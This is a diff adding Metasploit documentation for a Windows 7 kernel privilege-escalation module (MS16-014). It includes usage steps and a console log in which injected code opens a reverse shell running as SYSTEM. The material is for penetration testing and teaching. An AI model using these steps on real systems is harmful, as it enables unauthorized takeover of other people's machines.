added documentation.

documentation/modules/exploit/windows/local/ms16_014_wmi_recv_notif.md

@@ -0,0 +1,36 @@
+## Intro
+
+This module exploits a uninitialized stack variable vulnerability present in the `win32k.sys` kernel driver on Windows 7 x64.  The vulnerability is described by MS16-014 and CVE-2016-0040.  The module allows the user to elevate privileges (NT AUTHORITY\SYSTEM)
+
+## Usage
+
+You'll first need to obtain a session on the target system.  Next, once the module is loaded, one simply needs to set the `payload` and `session` options.  From here, running the module will result in the payload being executed with system level privileges.
+
+An example session follows:
+
+
+```
+meterpreter > background
+[*] Backgrounding session 0...
+msf exploit(handler) > use exploits/windows/local/ms16_014_wmi_recv_notif
+msf exploit(ms16_014_wmi_recv_notif) > set session 0
+session => 0
+msf exploit(ms16_014_wmi_recv_notif) > exploit
+
+[*] Started reverse TCP handler on 172.16.38.170:4444 
+[*] Launching notepad to host the exploit...
+[+] Process 3948 launched.
+[*] Reflectively injecting the exploit DLL into 3948...
+[*] Injecting exploit into 3948...
+[*] Exploit injected. Injecting payload into 3948...
+[*] Payload injected. Executing exploit...
+[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
+[*] Command shell session 2 opened (172.16.38.170:4444 -> 172.16.38.129:49695) at 2018-03-07 08:27:57 -0800
+
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\whoami
+whoami
+SYSTEM
+```